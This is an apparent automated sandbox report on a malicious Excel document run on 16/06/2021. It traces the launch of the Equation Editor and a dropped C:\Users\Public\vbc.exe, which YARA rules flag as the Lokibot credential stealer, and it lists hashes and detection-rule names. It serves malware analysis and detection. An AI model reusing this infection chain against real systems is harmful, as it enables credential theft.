                            Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text {


                            Code Manipulations

                            Statistics

                            Behavior

                            System Behavior

                            General

                            Start time:12:28:49
                            Start date:16/06/2021
                            Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            Wow64 process (32bit):false
                            Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                            Imagebase:0x13f210000
                            File size:27641504 bytes
                            MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            General

                            Start time:12:29:11
                            Start date:16/06/2021
                            Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                            Wow64 process (32bit):true
                            Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                            Imagebase:0x400000
                            File size:543304 bytes
                            MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            General

                            Start time:12:29:15
                            Start date:16/06/2021
                            Path:C:\Users\Public\vbc.exe
                            Wow64 process (32bit):true
                            Commandline:'C:\Users\Public\vbc.exe'
                            Imagebase:0xd00000
                            File size:761856 bytes
                            MD5 hash:7146B0D2CAED6422C289A08F63A5C685
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:.Net C# or VB.NET
                            Yara matches:
                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2170925331.0000000003369000.00000004.00000001.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000004.00000002.2170925331.0000000003369000.00000004.00000001.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000004.00000002.2170925331.0000000003369000.00000004.00000001.sdmp, Author: Joe Security
                            • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000004.00000002.2170925331.0000000003369000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp, Author: Joe Security
                            • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                            Antivirus matches:
                            • Detection: 11%, ReversingLabs
                            Reputation:low

                            General

                            Start time:12:29:18
                            Start date:16/06/2021
                            Path:C:\Users\Public\vbc.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Users\Public\vbc.exe
                            Imagebase:0xd00000
                            File size:761856 bytes
                            MD5 hash:7146B0D2CAED6422C289A08F63A5C685
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: Loki_1, Description: Loki Payload, Source: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                            • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                            Reputation:low

                            Disassembly

                            Code Analysis
